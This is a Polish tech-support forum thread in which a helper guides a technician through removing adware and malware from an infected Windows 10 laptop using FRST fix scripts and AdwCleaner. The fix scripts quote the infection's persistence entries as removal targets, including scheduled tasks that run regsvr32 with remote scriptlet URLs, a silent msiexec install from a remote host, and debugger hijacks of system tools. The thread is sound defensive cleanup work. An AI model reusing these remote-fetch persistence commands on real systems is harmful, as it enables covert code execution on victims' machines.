Logi do sprawdzenia po awarii Win 10

d-avid · 19 Października 2017

Witam, pacjent laptop Dell na WIN10. Przyszedł do mnie z brakiem możliwości podłączenia do internetu. Brak możliwości włączeń usług odpowiedzialnych za połączenie Wifi i po kablu. Zainstalowałem najnowsze sterowniki do karty sieciowej i naprawiłem przez instalacje Windows na nowo ale z zachowaniem plików i aplikacji (Antywirus albo malware usunęło/uszkodziło jakieś pliki?). Wywaliłem mccafe antywirus i kilka innych które wyglądały na syf. Zainstalowany Avasta antyvir. Proszę o sprawdzenie logów.

FRST: http://wklej.org/id/3274088/

Addition: http://wklej.org/id/3274089/

Schortcut: http://wklej.org/id/3274090/

filutka78 · 19 Października 2017

Są różne infekcje, w tym jest także fałszywy Firefox, i Eastness, który udaje Google Chrome.

1) Spróbuj odinstalować

YAC(Yet Another Cleaner!) (HKLM-x32\...\iSafe) (Version: - ELEX DO BRASIL PARTICIPAÇÕES LTDA) <==== UWAGA

2)

CHR res: Zainfekowany resources.pak (search_engine). Przeinstaluj Chrome. <==== UWAGA

Przeinstaluj Chrome!

3) Uruchom FRST. NA klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

FirewallRules: [{EF4DD3CD-F3FB-4833-8332-7ECB4FD21222}] => (Allow) C:\Program Files (x86)\MIO\loader\toshibaxmq01abd100_56n8s438sxx56n8s438s.dat
FirewallRules: [{4662387D-9140-4A54-85F3-2FFA48F87330}] => (Allow) C:\Program Files (x86)\MIO\loader\toshibaxmq01abd100_56n8s438sxx56n8s438s.dat
FirewallRules: [{3A71659D-341B-44BB-A2AC-CE340718B393}] => (Allow) C:\Program Files (x86)\Eastness\Application\chrome.exe
FirewallRules: [{C6B3AE97-0EFA-40BF-9FB6-CF1AF09F4A19}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{2B97FC6A-A32B-4BCA-9567-36B37C2E72F3}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
RemoveDirectory: C:\Program Files (x86)\MIO
RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Program Files (x86)\Eastness
C:\Users\karin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
Task: {C1052FCF-94FB-4AB2-A809-F57FE8538E3E} - System32\Tasks\Windows-WoShiBeiYongDe => regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj81OYU3OTQXOUM3FdMdOWNSNkVSFTHcMkZYMYM3FdUdFq== scrobj.dll <==== UWAGA
Task: {B35B1B8E-D276-4B62-9945-41E2ADB6574A} - System32\Tasks\PowerWord-SCT-JT => regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj81OYU3OTQXOUM3FdMdOWNSNkVSFTHcMkZYMYM3FdUdFq== scrobj.dll <==== UWAGA
Task: {63247131-911B-48A5-9E39-B325D647E66B} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () <==== UWAGA
Task: {437B2855-06CE-42BC-BF53-E8BFE168873E} - System32\Tasks\Windows-PG => C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\windows\psgo\psgo.ps1 <==== UWAGA
HKU\S-1-5-21-360642920-2756711326-4122858939-1001\...\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== UWAGA
R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
S1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
R1 iSafeNetFilter; C:\WINDOWS\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) <==== UWAGA
C:\WINDOWS\System32\DRIVERS\iSafeNetFilter.sys
HKU\S-1-5-21-360642920-2756711326-4122858939-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== UWAGA
FF SearchPlugin: C:\Users\karin\AppData\Roaming\Firefox\Firefox\Profiles\k7ph2qj0.default\searchplugins\startsearch.xml [2017-04-17]
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF Extension: (McAfee WebAdvisor) - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2017-07-20]
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF ProfilePath: C:\Users\karin\AppData\Roaming\Firefox\Firefox\Profiles\k7ph2qj0.default [2017-08-07] <==== UWAGA
FF Homepage: Firefox\Firefox\Profiles\k7ph2qj0.default -> hxxp://www.searchinme.com//?type=hp&ts=1494236995115&z=bafcdb17c9d7a609e7a6f29g0z2teo0z8q1cdt6g3b&from=official&uid=TOSHIBAXMQ01ABD100_56N8S438SXX56N8S438S
FF Extension: (SimilarWeb) - C:\Users\karin\AppData\Roaming\Firefox\Firefox\Profiles\k7ph2qj0.default\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2017-04-21] [brak podpisu cyfrowego]
FF Extension: (HSearch) - C:\Users\karin\AppData\Roaming\Firefox\Firefox\Profiles\k7ph2qj0.default\Extensions\@E97YHOMI-FU8L-IM23-VUT9-RVDZT7M8XL8H.xpi [2017-04-18] [brak podpisu cyfrowego]
FF Extension: (FF Adr) - C:\Users\karin\AppData\Roaming\Firefox\Firefox\Profiles\k7ph2qj0.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-04-17] [brak podpisu cyfrowego]
FF Extension: (Polski Language Pack) - C:\Users\karin\AppData\Roaming\Firefox\Firefox\Profiles\k7ph2qj0.default\Extensions\langpack-pl@firefox.mozilla.org.xpi [2017-04-17] [brak podpisu cyfrowego]
Edge HomeButtonPage: HKU\S-1-5-21-360642920-2756711326-4122858939-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=1492587483&z=835afed3c78f691a9be6184gbzft6o3w3b7m9z9q9z&from=che0812&uid=TOSHIBAXMQ01ABD100_56N8S438SXX56N8S438S
SearchScopes: HKU\S-1-5-21-360642920-2756711326-4122858939-1001 -> {331CED5C-BE6A-4907-9A20-B17ECFBD61DB} URL =
HKU\S-1-5-21-360642920-2756711326-4122858939-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494500557&z=56a58b80548b939afe261f7g0z7tezfw9e2edw8w9c&from=che0812&uid=TOSHIBAXMQ01ABD100_56N8S438SXX56N8S438S
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492587483&z=835afed3c78f691a9be6184gbzft6o3w3b7m9z9q9z&from=che0812&uid=TOSHIBAXMQ01ABD100_56N8S438SXX56N8S438S&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494500557&z=56a58b80548b939afe261f7g0z7tezfw9e2edw8w9c&from=che0812&uid=TOSHIBAXMQ01ABD100_56N8S438SXX56N8S438S
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492587483&z=835afed3c78f691a9be6184gbzft6o3w3b7m9z9q9z&from=che0812&uid=TOSHIBAXMQ01ABD100_56N8S438SXX56N8S438S&q={searchTerms}
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== UWAGA
HKU\S-1-5-21-360642920-2756711326-4122858939-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj84MjY2NWMyFkM8NjVWFjU5RjZWMYRLNWZQNThYFjRXMq== /q <==== UWAGA
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
IFEO\taskmgr.exe: [Debugger]
RemoveDirectory: C:\Program Files (x86)\Elex-tech
EmptyTemp:

Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).

4) Użyj >Adw-cleaner

najpierw kliknij na SKANUJ (SCAN), a dopiero po zakończeniu skanowania, gdy uaktywni się przycisk OCZYŚĆ (CLEANING), to kliknij na niego.

Pokaż raport z niego "C"

5) Zrób nowe logi FRST

przed skanem zaznacz: Additional.txt Shortcut.txt,

F.

(zajrzę tu dopiero ok. 21:35)

d-avid · 19 Października 2017

Przy odinstalowaniu YAC:

[Window Title]
C:\Program Files (x86)\Elex-tech\YAC\uninstall.exe

[Content]
System Windows nie może odnaleźć pliku „C:\Program Files (x86)\Elex-tech\YAC\uninstall.exe”. Upewnij się, że wpisana nazwa jest poprawna i spróbuj ponownie.

[OK]

Usunąć ręcznie folder?

Odinstalowałem wszystko co wyglądało podejrzanie + frst fix + czyszczecnie adwcleaner + frst scan. Efekty:

Fixlog frsta: http://wklej.org/id/3274137/

Adwcleaner: http://wklej.org/id/3274134/

FRST: http://wklej.org/id/3274138/

Additional: http://wklej.org/id/3274139/

Schortcut: http://wklej.org/id/3274140/

filutka78 · 19 Października 2017

C:\Users\karin\AppData\Roaming\PCDr\Repair\BundleApplicationRepairTool.exe

znasz to?

Kosmetyka:

Uruchom FRST. NA klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

HKLM\...\Run: [MRT] => C:\WINDOWS\system32\MRT.exe [138202976 2017-09-13] (Microsoft Corporation)
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== UWAGA
SearchScopes: HKU\S-1-5-21-360642920-2756711326-4122858939-1001 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
SearchScopes: HKU\S-1-5-21-360642920-2756711326-4122858939-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
S2 0143981508429712mcinstcleanup; C:\Users\karin\AppData\Local\Temp\014398~1.EXE -cleanup -nolog [X] <==== UWAGA
C:\Users\karin\Desktop\inne\Format Factory.lnk
EmptyTemp:

Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).

F.

d-avid · 19 Października 2017

"C:\Users\karin\AppData\Roaming\PCDr\Repair\BundleApplicationRepairTool.exe" - usunięte

fixlog: http://wklej.org/id/3274295/

frst: http://wklej.org/id/3274292/

additional: http://wklej.org/id/3274293/

schortcut: http://wklej.org/id/3274294/

filutka78 · 19 Października 2017

Uruchom FRST. NA klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

Task: {D7479C91-8C0A-40BE-B0BC-2875C0B47395} - System32\Tasks\BundleApplicationRepairToolLauncherTask => C:\Users\karin\AppData\Roaming\PCDr\Repair\BundleApplicationRepairTool.exe
Task: {CF2A4505-737F-40CE-847C-80173B78C2BF} - System32\Tasks\Pcd.DriverScan.YJNRX => C:\Users\karin\AppData\Roaming\PCDr\Downloads\DriverInstaller.exe
Task: {5DDD75F3-408B-45B0-831B-BE6532ED1045} - System32\Tasks\Pcd.DriverScan.RY1M7 => C:\Users\karin\AppData\Roaming\PCDr\Downloads\DriverInstaller.exe
RemoveDirectory: C:\Users\karin\AppData\Roaming\PCDr
AlternateDataStreams: C:\WINDOWS\system32\Drivers\pwlwkvoh.sys:changelist [5854]
EmptyTemp:

Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).

F.

d-avid · 20 Października 2017

Mam nadzieję, że to już ostatni:

fixlog http://wklej.org/id/3274712/

frst http://wklej.org/id/3274715/

addition http://wklej.org/id/3274716/

schortcut http://wklej.org/id/3274717/

filutka78 · 20 Października 2017

W logach nie widzę już niczego podejrzanego, więc powinno być OK.

F.

d-avid · 20 Października 2017

Kolejny raz dziękuję i gorąco pozdrawiam!

Temat został przeniesiony do archiwum

Logi do sprawdzenia po awarii Win 10

Rekomendowane odpowiedzi

d-avid 0

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi

Udostępnij na innych stronach

filutka78 11

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi

Udostępnij na innych stronach

d-avid 0

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi

Udostępnij na innych stronach

filutka78 11

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi

Udostępnij na innych stronach

d-avid 0

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi

Udostępnij na innych stronach

filutka78 11

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi

Udostępnij na innych stronach

d-avid 0

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi

Udostępnij na innych stronach

filutka78 11

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi

Udostępnij na innych stronach

d-avid 0

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi

Udostępnij na innych stronach

Ostatnio przeglądający 0 użytkowników

Tematy

Odpowiedzi

Aktywni użytkownicy

Przeglądaj

Aktywność